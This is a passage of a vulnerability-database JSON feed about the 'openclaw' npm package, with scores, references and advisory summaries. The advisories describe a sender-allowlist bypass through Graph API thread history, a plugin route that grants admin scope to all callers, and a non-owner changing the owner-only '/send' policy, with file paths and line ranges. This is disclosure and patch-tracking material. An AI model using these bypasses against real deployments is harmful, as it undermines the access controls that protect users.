ulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerabil
ity":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerabil
ity":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerabil
ity":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["CVE-2026-27646","GHSA-9q36-67vc-rrwg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.i
o/vulnerabilities/VCID-j6nj-gf5b-1khk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89568?format=json","vulnerability_id":"VCID-j8fb-fhyc-33fu","summary":"OpenClaw: MSTeams thread history bypasses sender allowlist via Graph API\n## Summary\nMSTeams thread history bypasses sender allowlist via Graph API\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 MS Teams because Graph-fetched thread history bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `5cca38084074fb5095aa11b6a59820d63e4937c9` — 2026-03-30T15:38:26+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41365","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41365"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5cca38084074fb5095aa11b6a59820d63e4937c9","reference_id":"","reference_type":"","scores":[{"value":"5.4","scori
ng_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5cca38084074fb5095aa11b6a59820d63e4937c9"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-chfm-xgc4-47rj","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-chfm-xgc4-47rj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41365","reference_id":"","reference_type":"","scores"
:[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41365"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-graph-api-thread-history","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-graph-api-thread-history"},{"reference_url":"https://github.com/advisories/GHSA-chfm-xgc4-47rj","reference_id":"GHSA-chfm-xgc4-47rj","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-chfm-xgc4-47rj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID
-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID
-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41365","GHSA-chfm-xgc4-47rj"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j8fb-fhyc-33fu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91262?format=json","vulnerability_id":"VCID-j92n-5217-9bhj","summary":"OpenClaw: Gateway Plugin HTTP Auth Grants Unrestricted operator.admin Runtime Scope to All Callers\n## Summary\n\nGateway Plugin HTTP auth: \"gateway\" 
Mints operator.admin Runtime Scope\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGateway-authenticated plugin HTTP routes previously created a runtime scope set that included `operator.admin` regardless of caller-granted scopes. Commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe` keeps plugin HTTP runtime scopes least-privileged and preserves caller scope boundaries.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`.\n\n## Fix Commit(s)\n\n- `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35669","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35669"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"},{"valu
e":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35669","reference_id":"CVE-2026-35669","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35669"},{"reference_url":"https://github.com/advisories/GHSA-qm2m-28pf-hgjw","reference_id":"GHSA-qm2m-28pf-hgjw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qm2m-28pf-hgjw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope","reference_id":"openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope","reference_type":"","scores":[{"value":"8.8","scoring_
system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope"}],"fixed_packages":[],"aliases":["CVE-2026-35669","GHSA-qm2m-28pf-hgjw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j92n-5217-9bhj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91382?format=json","vulnerability_id":"VCID-j96c-kau3-7fag","summary":"OpenClaw: Non-owner command-authorized sender can change the owner-only `/send` session delivery policy\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n**Title**  \nNon-owner command-authorized sender can change the owner-only `/send` session delivery policy\n\n**CWE**  \nCWE-285 Improper Authorization\n\n**CVSS v3.1**  \nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L  \nBase score: **5.4 (Medium)**\n\n**Severity Assessment**  \nMedium. 
This is a real owner-only authorization bypass, but the demonstrated impact is limited to persistent mutation of the current session’s delivery policy rather than direct code execution, sandbox escape, or cross-host compromise.\n\n**Impact**  \nA non-owner sender who is allowed to run commands can invoke `/send on|off|inherit` and persistently change the current session’s `sendPolicy`, even though OpenClaw documents `/send` as owner-only.\n\nThat lets a lower-trust participant:\n- disable reply delivery for the current session (`/send off`), suppressing future replies in that chat;\n- re-enable reply delivery (`/send on`) after the owner intentionally disabled it;\n- remove the session override (`/send inherit`).\n\n**Affected Component**  \nVerified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`.\n\nExact vulnerable path on the shipped tag:\n- `src/auto-reply/reply/commands-session.ts:212-239`\n  - `handleSendPolicyCommand(...)` checks only `params.command.isAuthorizedSender`.\n  - when true, it mutates `params.sessionEntry.sendPolicy` and persists the session entry.\n\nAuthorization behavior that makes this reachable:\n- `src/auto-reply/command-auth.ts:401-407`\n  - `senderIsOwner` is computed separately from general command authorization.\n- `src/auto-reply/command-auth.ts:420-429`\n  - command authorization can succeed even when `senderIsOwner === false`.\n- `src/auto-reply/command-auth.owner-default.test.ts:10-47`\n  - existing coverage confirms a sender can be command-authorized while not treated as owner.\n\nDocumented owner-only contract:\n- `docs/tools/slash-commands.md:112`\n  - `/send on|off|inherit` is documented as owner-only.\n- `docs/concepts/session-tool.md:156`\n  - `sendPolicy` is documented as settable via `sessions.patch` or owner-only `/send on|off|inherit`.\n\nRelated privilege model:\n- `src/gateway/method-scopes.ts:131-133`\n  - `sessions.patch` is 
